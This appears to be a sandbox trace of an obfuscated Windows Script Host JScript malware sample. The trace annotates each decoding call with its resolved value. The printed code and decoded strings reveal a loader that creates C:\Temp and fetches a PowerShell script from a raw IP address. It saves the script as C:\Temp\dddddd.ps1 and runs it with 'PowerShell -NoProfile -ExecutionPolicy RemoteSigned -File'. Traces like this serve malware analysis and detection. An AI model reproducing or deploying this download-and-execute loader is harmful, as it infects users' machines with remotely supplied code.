                                                                              • _0x3d8f() ➔ MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28
                                                                              • _0x3d8f() ➔ MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28
                                                                              • _0x3d8f() ➔ 371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP
                                                                              • _0x3d8f() ➔ rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU
                                                                              • _0x3d8f() ➔ q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU
                                                                              • _0x3d8f() ➔ bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0
                                                                              • _0x3d8f() ➔ bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0
                                                                              • _0x3d8f() ➔ W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG
                                                                              • _0x3d8f() ➔ message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4
                                                                              5
                                                                              return _0x1bc8c2;
                                                                                6
                                                                                };
                                                                                  7
                                                                                  return _0x3d8f ( );
                                                                                  • _0x3d8f() ➔ MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28
                                                                                  8
                                                                                  }
                                                                                    9
                                                                                    ( function (_0x47f2ce, _0x45b0b8) {
                                                                                    • (function _0x3d8f(),918695) ➔ undefined
                                                                                    • (function _0x3d8f(),918695) ➔ undefined
                                                                                    10
                                                                                    var _0x41ea74 = _0x2aa5, _0x34690f = _0xe32f, _0x5bad84 = _0x5598, _0x5eaacf = _0x47f2ce ( );
                                                                                    • _0x3d8f() ➔ MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28
                                                                                    11
                                                                                    while (! ! [ ] )
                                                                                      12
                                                                                      {
                                                                                        13
                                                                                        try
                                                                                          14
                                                                                          {
                                                                                            15
                                                                                            var _0x2ad534 = parseInt ( _0x5bad84 ( 0x116, 'E3DQ' ) ) / 0x1 * ( parseInt ( _0x5bad84 ( 0x130, '[aOH' ) ) / 0x2 ) + parseInt ( _0x5bad84 ( 0x12f, 'ClmG' ) ) / 0x3 * ( parseInt ( _0x34690f ( 0x136 ) ) / 0x4 ) + - parseInt ( _0x41ea74 ( 0x115 ) ) / 0x5 + parseInt ( _0x5bad84 ( 0x129, 'GEGf' ) ) / 0x6 + - parseInt ( _0x41ea74 ( 0x123 ) ) / 0x7 + - parseInt ( _0x41ea74 ( 0x132 ) ) / 0x8 * ( - parseInt ( _0x5bad84 ( 0x128, 'h#TZ' ) ) / 0x9 ) + parseInt ( _0x41ea74 ( 0x122 ) ) / 0xa * ( parseInt ( _0x41ea74 ( 0x11e ) ) / 0xb );
                                                                                            • _0x5598(278,"E3DQ") ➔ "\xd4\x1a\x98\xec\xb8I,\x03EQL\xd4\x17"
                                                                                            • parseInt("\xd4\x1a\x98\xec\xb8I,\x03EQL\xd4\x17") ➔ NaN
                                                                                            • _0x5598(304,"[aOH") ➔ undefined
                                                                                            • _0x5598(278,"E3DQ") ➔ undefined
                                                                                            • _0x5598(278,"E3DQ") ➔ undefined
                                                                                            • _0x5598(278,"E3DQ") ➔ undefined
                                                                                            • _0x5598(278,"E3DQ") ➔ "PX<B\xdd\x11\xdeL\xe7y\xa2\x01|P>%\xbe\x92\xe1\xac\xbf\xd5\x83\xa9ZUC L\x1a\xd7)N_A-\x8a"
                                                                                            • parseInt("PX<B\xdd\x11\xdeL\xe7y\xa2\x01|P>%\xbe\x92\xe1\xac\xbf\xd5\x83\xa9ZUC L\x1a\xd7)N_A-\x8a") ➔ NaN
                                                                                            • _0x5598(304,"[aOH") ➔ undefined
                                                                                            • _0x5598(278,"E3DQ") ➔ undefined
                                                                                            • _0x5598(278,"E3DQ") ➔ "\xb8\xc6N\x937\x07\xa6\xa3\x0c\xb5"
                                                                                            • parseInt("\xb8\xc6N\x937\x07\xa6\xa3\x0c\xb5") ➔ NaN
                                                                                            • _0x5598(304,"[aOH") ➔ "\xc3\xba\x02\xa7\xcc\x8a\xc6f>\xb1\xd0\x97N\xcd"
                                                                                            • parseInt("\xc3\xba\x02\xa7\xcc\x8a\xc6f>\xb1\xd0\x97N\xcd") ➔ NaN
                                                                                            • _0x5bad84(303,"ClmG") ➔ "\xac\xf9\x1a\xbd\xf5'h\xa2\x97\xf2tB"
                                                                                            • parseInt("\xac\xf9\x1a\xbd\xf5'h\xa2\x97\xf2tB") ➔ NaN
                                                                                            • _0xe32f(310) ➔ "W4iJW43dGGa8W5i7W40iWOVcRq4"
                                                                                            • parseInt("W4iJW43dGGa8W5i7W40iWOVcRq4") ➔ NaN
                                                                                            • _0x2aa5(277) ➔ undefined
                                                                                            • _0x5bad84(278,"E3DQ") ➔ "\xd5\x83U\x8bq\xf5L\x0f\x91\xc0!\xc9"
                                                                                            • parseInt("\xd5\x83U\x8bq\xf5L\x0f\x91\xc0!\xc9") ➔ NaN
                                                                                            • _0x5bad84(304,"[aOH") ➔ undefined
                                                                                            • _0x5bad84(278,"E3DQ") ➔ "\xad_\xb6\xe2"
                                                                                            • parseInt("\xad_\xb6\xe2") ➔ NaN
                                                                                            • _0x5bad84(304,"[aOH") ➔ undefined
                                                                                            • _0x5bad84(278,"E3DQ") ➔ "/\x0ed\x18\x8fA\xcaV\xfc6\xab\x15\"
                                                                                            • parseInt("/\x0ed\x18\x8fA\xcaV\xfc6\xab\x15\") ➔ NaN
                                                                                            • _0x5bad84(304,"[aOH") ➔ "\xb7\xf0]\xe7\x97\xd6\x93r9\xbc\xd7\xbay\xd6\xe1\xd3\xde\xc0&HU\xc4\x00\xee\x02\xbc\xd2\x07\xb06v\xd1E\x0f\x0e \xe9QY"
                                                                                            • parseInt("\xb7\xf0]\xe7\x97\xd6\x93r9\xbc\xd7\xbay\xd6\xe1\xd3\xde\xc0&HU\xc4\x00\xee\x02\xbc\xd2\x07\xb06v\xd1E\x0f\x0e \xe9QY") ➔ NaN
                                                                                            • _0x5bad84(303,"ClmG") ➔ undefined
                                                                                            • parseInt("\xb4\x86=\xc1\xa4\xd8\xdc\x83t\x13o(\xa8\xb9\x9f\xfb\xff\xdd\xcc\x8b7\xde=\x81\xf4h") ➔ NaN
                                                                                            • _0x5bad84(304,"[aOH") ➔ "\xb1\xfaQ\xf2\x8a\xdd\xbb0 \xba\xc6\xa7"
                                                                                            • parseInt("\xb1\xfaQ\xf2\x8a\xdd\xbb0 \xba\xc6\xa7") ➔ NaN
                                                                                            • _0x5bad84(303,"ClmG") ➔ "\xda\xb6B\xf8\xa5yl\xd0\x81\xfej~\xfcK\xc8 et\x0e\xe8\xaf\xd1u\xa1\x95K rB\xcdzy\x98b\xb3v-\x9f\xc9"
                                                                                            • parseInt("\xda\xb6B\xf8\xa5yl\xd0\x81\xfej~\xfcK\xc8 et\x0e\xe8\xaf\xd1u\xa1\x95K rB\xcdzy\x98b\xb3v-\x9f\xc9") ➔ NaN
                                                                                            • _0xe32f(310) ➔ "rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia"
                                                                                            • parseInt("rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia") ➔ NaN
                                                                                            • _0x2aa5(277) ➔ "9716744ntollE"
                                                                                            • parseInt("9716744ntollE") ➔ 9716744
                                                                                            • _0x5bad84(297,"GEGf") ➔ "o\xe8\xc7 \xe5v\xa4\xe3<\x1dt\xb7E\xd4\x1e\xb2j\xaeVZ\xc6[\xd3\xb8jg"
                                                                                            • parseInt("o\xe8\xc7 \xe5v\xa4\xe3<\x1dt\xb7E\xd4\x1e\xb2j\xaeVZ\xc6[\xd3\xb8jg") ➔ NaN
                                                                                            • _0x2aa5(291) ➔ undefined
                                                                                            • parseInt("\xc7$"\xe9") ➔ NaN
                                                                                            • _0x5bad84(304,"[aOH") ➔ "\xf6\x88Lw-[\xb2"
                                                                                            • parseInt("\xf6\x88Lw-[\xb2") ➔ NaN
                                                                                            • _0x5bad84(303,"ClmG") ➔ "\xdc\xbcN\xed\xb8rD\x92\x98\xf8{c"
                                                                                            • parseInt("\xdc\xbcN\xed\xb8rD\x92\x98\xf8{c") ➔ NaN
                                                                                            • _0xe32f(310) ➔ "124678FeSFCc"
                                                                                            • parseInt("124678FeSFCc") ➔ 124678
                                                                                            • _0x2aa5(277) ➔ "\xa2\xbfh\xef\x1c\xad"\xbb\xfcJ\xa8Q\xb1\x8a\xd4\xaa$o}H\xffn\xcc{\xc6X"
                                                                                            • parseInt("\xa2\xbfh\xef\x1c\xad"\xbb\xfcJ\xa8Q\xb1\x8a\xd4\xaa$o}H\xffn\xcc{\xc6X") ➔ NaN
                                                                                            • _0x5bad84(297,"GEGf") ➔ undefined
                                                                                            • parseInt("\xd3\x1b\x9c\xe2\xed\x11q$~q") ➔ NaN
                                                                                            • _0x5bad84(304,"[aOH") ➔ "0\xab\xf9Q\xfe\x84&i\x87\xd7.~\x07"
                                                                                            • parseInt("0\xab\xf9Q\xfe\x84&i\x87\xd7.~\x07") ➔ 0
                                                                                            • _0x5bad84(303,"ClmG") ➔ "\x9b\xceSh\x1f\xf4M"
                                                                                            • parseInt("\x9b\xceSh\x1f\xf4M") ➔ NaN
                                                                                            • _0xe32f(310) ➔ "WQ7dVXVcVCkpCLJcM8keW6W"
                                                                                            • parseInt("WQ7dVXVcVCkpCLJcM8keW6W") ➔ NaN
                                                                                            • _0x2aa5(277) ➔ "\xd1\x1dw\xc7"
                                                                                            • parseInt("\xd1\x1dw\xc7") ➔ NaN
                                                                                            • _0x5bad84(297,"GEGf") ➔ "\xc3-\xcb\xcb =\x81?\xdb\x13\x84\xad"
                                                                                            • parseInt("\xc3-\xcb\xcb =\x81?\xdb\x13\x84\xad") ➔ NaN
                                                                                            • _0x2aa5(291) ➔ "\xa1\xedZ\xf7"
                                                                                            • parseInt("\xa1\xedZ\xf7") ➔ NaN
                                                                                            • _0x2aa5(306) ➔ undefined
                                                                                            • parseInt("PV9J\xdd\x07\xbb@\xe1*\xb3 ") ➔ NaN
                                                                                            • _0x5bad84(304,"[aOH") ➔ "\xb4\xe9]\xff\x9b\xdc\xd4&%\xff\xc0\xabl\xc1\xb4\xc3\xce\x85VSM\x81\x16\xd2\x1d\xb7\xd2\x04\xf1!5\xc5M\x16\x16F\xbb"
                                                                                            • parseInt("\xb4\xe9]\xff\x9b\xdc\xd4&%\xff\xc0\xabl\xc1\xb4\xc3\xce\x85VSM\x81\x16\xd2\x1d\xb7\xd2\x04\xf1!5\xc5M\x16\x16F\xbb") ➔ NaN
                                                                                            • _0x5bad84(303,"ClmG") ➔ undefined
                                                                                            • parseInt("\w/.q\xca\xac\xc9\xce3") ➔ NaN
                                                                                            • _0x5bad84(303,"ClmG") ➔ undefined
                                                                                            • parseInt("124678FeSFCc") ➔ 124678
                                                                                            • _0x5bad84(303,"ClmG") ➔ "1101CeSkvq"
                                                                                            • parseInt("1101CeSkvq") ➔ 1101
                                                                                            • _0xe32f(310) ➔ "5836fimqHT"
                                                                                            • parseInt("5836fimqHT") ➔ 5836
                                                                                            • _0x2aa5(277) ➔ "5141585tSDBkb"
                                                                                            • parseInt("5141585tSDBkb") ➔ 5141585
                                                                                            • _0x5bad84(297,"GEGf") ➔ "2978310VstcUa"
                                                                                            • parseInt("2978310VstcUa") ➔ 2978310
                                                                                            • _0x2aa5(291) ➔ "12642224tnuDGo"
                                                                                            • parseInt("12642224tnuDGo") ➔ 12642224
                                                                                            • _0x2aa5(306) ➔ "9716744ntollE"
                                                                                            • parseInt("9716744ntollE") ➔ 9716744
                                                                                            • _0x5bad84(296,"h#TZ") ➔ "9MuWyMs"
                                                                                            • parseInt("9MuWyMs") ➔ 9
                                                                                            • _0x41ea74(290) ➔ "371190cReolU"
                                                                                            • parseInt("371190cReolU") ➔ 371190
                                                                                            • _0x41ea74(286) ➔ "77WhCiSA"
                                                                                            • parseInt("77WhCiSA") ➔ 77
                                                                                            16
                                                                                            if ( _0x2ad534 === _0x45b0b8 )
                                                                                              17
                                                                                              break ;
                                                                                                18
                                                                                                else
                                                                                                  19
                                                                                                  _0x5eaacf['push'] ( _0x5eaacf['shift'] ( ) );
                                                                                                    20
                                                                                                    }
                                                                                                      21
                                                                                                      catch ( _0x417609 )
                                                                                                        22
                                                                                                        {
                                                                                                          23
                                                                                                          _0x5eaacf['push'] ( _0x5eaacf['shift'] ( ) );
                                                                                                            24
                                                                                                            }
                                                                                                              25
                                                                                                              }
                                                                                                                26
                                                                                                                } ( _0x3d8f, 0xe04a7 ) );
                                                                                                                  27
                                                                                                                  var URL = 'http://196.251.92.64/crypt/popo.ps1', DownloadPath = _0x429836 ( 0x121 ), TEMP_DIR = 'C:\x5cTemp', SUCCESS_STATUS = 0xc8, POWERSHELL_CMD = _0x429836 ( 0x112 ), shell = WScript[_0x165511 ( 0x127 ) ] ( 'WScript.Shell' ), fileSystem = WScript['CreateObject'] ( _0x36bb1e ( 0x133, ')$c]' ) ), http = WScript['CreateObject'] ( _0x429836 ( 0x124 ) );
                                                                                                                  • _0xe32f(289) ➔ "C:\Temp\dddddd.ps1"
                                                                                                                  • _0xe32f(274) ➔ "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "
                                                                                                                  • _0x165511(295) ➔ "CreateObject"
                                                                                                                  • Windows Script Host.CreateObject("WScript.Shell") ➔
                                                                                                                  • _0x36bb1e(307,")$c]") ➔ "Scripting.FileSystemObject"
                                                                                                                  • Windows Script Host.CreateObject("Scripting.FileSystemObject") ➔
                                                                                                                  • _0xe32f(292) ➔ "MSXML2.XMLHTTP"
                                                                                                                  • Windows Script Host.CreateObject("MSXML2.XMLHTTP") ➔
                                                                                                                  28
                                                                                                                  ! fileSystem[_0x165511 ( 0x113 ) ] ( TEMP_DIR ) && fileSystem[_0x429836 ( 0x11f ) ] ( TEMP_DIR );
                                                                                                                  • _0x165511(275) ➔ "FolderExists"
                                                                                                                  • FolderExists("C:\Temp") ➔ false
                                                                                                                  • _0xe32f(287) ➔ "CreateFolder"
                                                                                                                  • CreateFolder("C:\Temp") ➔ C:\Temp
                                                                                                                  29
                                                                                                                  function _0xe32f(_0x52b743, _0xdbcf57) {
                                                                                                                  • _0xe32f(310) ➔ "W4iJW43dGGa8W5i7W40iWOVcRq4"
                                                                                                                  • _0xe32f(310) ➔ "rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia"
                                                                                                                  • _0xe32f(310) ➔ "124678FeSFCc"
                                                                                                                  • _0xe32f(310) ➔ "WQ7dVXVcVCkpCLJcM8keW6W"
                                                                                                                  • _0xe32f(310) ➔ "5836fimqHT"
                                                                                                                  • _0xe32f(289) ➔ "C:\Temp\dddddd.ps1"
                                                                                                                  • _0xe32f(274) ➔ "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "
                                                                                                                  • _0xe32f(292) ➔ "MSXML2.XMLHTTP"
                                                                                                                  • _0xe32f(287) ➔ "CreateFolder"
                                                                                                                  • _0xe32f(282) ➔ "GET"
                                                                                                                  30
                                                                                                                  var _0x3d8f07 = _0x3d8f ( );
